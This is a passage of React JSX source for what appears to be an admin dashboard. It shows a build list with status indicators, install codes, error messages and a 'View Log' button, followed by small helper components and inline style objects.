              }}>
                <span style={{
                  width:8, height:8, borderRadius:'50%', flexShrink:0,
                  background: b.status==='done' ? 'var(--green)' : b.status==='building' ? '#f59e0b' : b.status==='queued' ? '#60a5fa' : '#ef4444',
                }}/>
                <span style={{ fontSize:12, color:'var(--muted)', minWidth:55 }}>#{b.id}</span>
                {b.admin_name && (
                  <span style={{ fontSize:11, color:'var(--muted)', background:'var(--border)', padding:'1px 6px', borderRadius:4 }}>
                    {b.admin_name}
                  </span>
                )}
                <span style={{
                  fontSize:12, fontWeight:600,
                  color: b.status==='done'?'var(--green)': b.status==='building'?'#f59e0b': b.status==='queued'?'#60a5fa':'#ef4444',
                  minWidth:65,
                }}>
                  {b.status==='done'?'Done': b.status==='building'?'Building…': b.status==='queued'?'Queued':'Failed'}
                </span>
                {b.install_code && (
                  <span style={{ fontSize:12, fontFamily:'monospace', color:'var(--green)', background:'var(--green)11', padding:'2px 8px', borderRadius:4 }}>
                    Code: {b.install_code}
                  </span>
                )}
                {b.error && (
                  <span style={{ fontSize:11, color:'#ef4444', flex:1 }} title={b.error}>
                    {b.error.length > 80 ? b.error.slice(0,80)+'…' : b.error}
                  </span>
                )}
                <span style={{ fontSize:11, color:'var(--muted)', marginLeft:'auto' }}>
                  {b.queued_at ? new Date(b.queued_at).toLocaleString() : ''}
                </span>
                <button
                  onClick={() => startLogPoll(b.id)}
                  style={{ ...btn(), fontSize:11, padding:'3px 10px' }}>
                  View Log
                </button>
              </div>
            ))}
          </div>
        )}
      </Section>
    </div>
  );
}

// ── Sub-components ────────────────────────────────────────────────────────────

function StatusItem({ label, value, ok, mono }) {
  return (
    <div style={{ minWidth: 160 }}>
      <div style={{ fontSize: 11, color: 'var(--muted)', textTransform: 'uppercase',
                    letterSpacing: .5, marginBottom: 4 }}>{label}</div>
      <div style={{
        fontSize: 13, color: ok ? 'var(--text)' : 'var(--muted)',
        fontFamily: mono ? 'monospace' : 'inherit',
        display: 'flex', alignItems: 'center', gap: 6,
      }}>
        <span style={{
          width: 7, height: 7, borderRadius: '50%', flexShrink: 0,
          background: ok ? 'var(--green)' : '#6b7280',
        }} />
        {value}
      </div>
    </div>
  );
}

function Section({ title, children }) {
  return (
    <div style={{ marginBottom: 28 }}>
      <div style={{ fontSize: 11, color: 'var(--muted)', textTransform: 'uppercase',
                    letterSpacing: .5, marginBottom: 12 }}>{title}</div>
      {children}
    </div>
  );
}

function Empty({ text }) {
  return (
    <div style={{ color: 'var(--muted)', fontSize: 13, textAlign: 'center',
                  padding: '24px 0' }}>{text}</div>
  );
}

const btn = (color) => ({
  padding: '8px 16px', fontSize: 13, fontWeight: color ? 600 : 400,
  background: color ? `${color}22` : 'transparent',
  border: `1px solid ${color || 'var(--border)'}`,
  borderRadius: 6, color: color || 'var(--muted)',
  cursor: 'pointer', whiteSpace: 'nowrap',
});

const inputStyle = {
  display: 'block', width: '100%', marginBottom: 12, padding: '9px 12px',
  background: 'var(--bg)', border: '1px solid var(--border)', borderRadius: 6,
  color: 'var(--text)', fontSize: 13, boxSizing: 'border-box',
};

const labelStyle = { display: 'block', marginBottom: 4, color: 'var(--muted)', fontSize: 12 };
